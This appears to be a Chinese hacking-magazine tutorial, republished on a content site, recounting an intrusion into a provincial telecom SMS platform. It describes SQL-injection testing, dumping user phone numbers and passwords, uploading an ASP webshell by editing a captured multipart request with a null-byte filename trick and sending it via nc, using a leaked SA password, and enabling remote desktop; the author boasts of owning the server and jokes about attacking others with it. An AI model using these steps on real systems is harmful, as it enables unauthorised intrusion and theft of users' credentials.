“灵机E动”敲开网通服务器大门网站安全

2024-04-09

“灵机E动”敲开网通服务器大门网站安全(共1篇)

篇1:“灵机E动”敲开网通服务器大门网站安全

适合读者:脚本入侵爱好者、网络管理员

前置知识:ASP代码阅读能力

脚本小子:号外号外!据最新消息,鸡年就要来到了(谁飞砖头?),脚本小子得赶紧祝大家新年快乐,万事如意,不然读者朋友们怪罪下来我可担当不起啊!新年了,总得意思一下吧,所以本期的各个精彩文章

适合读者:脚本入侵爱好者、网络管理员

前置知识:ASP代码阅读能力

脚本小子:号外号外!据最新消息,鸡年就要来到了(谁飞砖头?),脚本小子得赶紧祝大家新年快乐,万事如意,不然读者朋友们怪罪下来我可担当不起啊!新年了,总得意思一下吧,所以本期的各个精彩文章就是小编们送给大家最好的礼物了!希望大家在新的一年里才思如泉涌!技术节节高升!鸡年多肉鸡!

“灵机E动”敲开网通服务器大门

文/图 master_志

现在全国地小灵通都开通了网上短信地业务,而且都建设了自己地服务平台,名字比较特别――“灵机E动”。我们省也开通了这个服务,正好我用的也是小灵通,于是就去看看怎么发短信,这一看可不要紧,竟然抓到了这只网通地大肉鸡。

好了,长话短说,首先我们先找一个注入点吧!如图1所示。

图1

地址是phs.**.cn/mobile_site/friend_fairyland/cjyhzl.asp?jyuserid=1019,然后我们可以用 and 1=1和and 1=2去简单地测试一下有没有SQL注入漏洞,怎么测试我就不说了,如果你不知道的话,还是好好地看一下2004年的黑防吧!

经过我的测试数据库是MSSQL,这个用脑袋想也能想到:这个是全省的小灵通服务平台,用MSSQL是很正常的。说到MSSQL数据库你是不是想到了小竹?呵呵,想他干啥?应该是想他写的NBSI2才对。拿出我们的宝贝干活吧!如图2所示。

图2

可惜不是SA权限,不过也不错了,至少我们可以看看它的数据库里都有什么,这可是全省的数据哦!如图3所示。

图3

好多表!我们只要找Tab_user_mobile这个表就行了,这里面有用户注册的信息也就是电话和密码。如图4所示。

图4

我们随便找一个登陆一下,到它的交友中心去看看吧?记得那里可以上传照片,大家不用我说都知道该干什么了吧?网通也会出现这漏洞?事实如此,我们继续。如图5所示。

图5

添上我们的木马然后准备好抓包,抓到的包内容如下:

POST /mobile_site/friend_fairyland/jyly_tpsc_check.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*

Referer: phs.**.cn/mobile_site/friend_fairyland/sctp.asp

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=-----------------7d45d3b5e047e

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Host: phs.**.cn

Content-Length: 1724

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSAQRBTT=GMEJHDHADNJEHBPKKKJEPDDP

---------------------7d45d3b5e047e

Content-Disposition: form-data; name=“user_pic_name”; filename=“C:Documents and Settings晓志桌面hackNewmm.asp”

木马内容……

--------------------7d45d3b5e047e

Content-Disposition: form-data; name=“user_pic_nameB”; filename=“”

Content-Type: application/octet-stream

---------------------7d45d3b5e047e

Content-Disposition: form-data; name=“Submit”

提交

---------------------------7d45d3b5e047e―

我们需要改的地方是这里:Content-Disposition:form-data;name=“user_pic_name”;filename=“C:Documents and Settings晓志桌面hackNewmm.asp”,改为:Content-Disposition: form-data; name=“user_pic_name”; filename=“C:Documents and Settings晓志桌面hackNewmm.asp .jpg”(注意asp和.jpg之间有一个空格),

还有需要改的地方是:Content-Length:1724,我们需要在这个数字原来的大小加上5,因为我们在原来的基础是加了5个字符,改为:Content-Length: 1729。

好了,拿出WinHex把刚才多出来的空格20改为00,然后拿出NC提交吧!命令格式为“NC.EXE 网站地址 80 〈改过地包.txt”,如图6所示。

图6

好了,我们的马已经传上去了,登陆上去看看我们的木马(如图7所示):

phs.**.cn/mobile_site/friend_fairyland/photo/1045.asp

图7

我传上去的是我自己改过的网页木马,成功后开始搜索它的文件,无意见看到了CONN.ASP里面有一段写的是:

conn.Open“provider=sqloledb;server=218.*.***.229;database=mobileportal;uid=sa;pwd=yidongjisuan”

看到没?SA的密码就是“yidongjisuan”!好了,我们直接连接上去吧,然后直接给它开3389。传3389.bat上去,然后用我们的SA权限去执行!如图8所示。

图8

呵呵,登陆上去才知道这个平台是网通专门为**省小灵通服务单独开的一台服务器,配置是4路至强2.8,1G的ECC效验内存,硬盘是双72G的SISC硬盘,初步判断这是一台IBM的服务器。这个可是我的肉鸡啊!哈哈,大家以后别惹我哦,小心我用它D你哦,嘿嘿!

这个教程很简单,并没有什么技术含量,但是希望大家可以从文章里学到入侵的思路及发现漏洞的意识,更关键的是想让大家多注意一下国内网络安全的现状,多通过自己的努力去改变它、提高它――大家不必再拿这个站做测试了,我已经通知网通的人修补了漏洞!最后祝大家新年快乐,肉鸡多多!

上一篇:幼儿园厨师安全责任书下一篇:干部人事档案整理方案

本站热搜

    相关推荐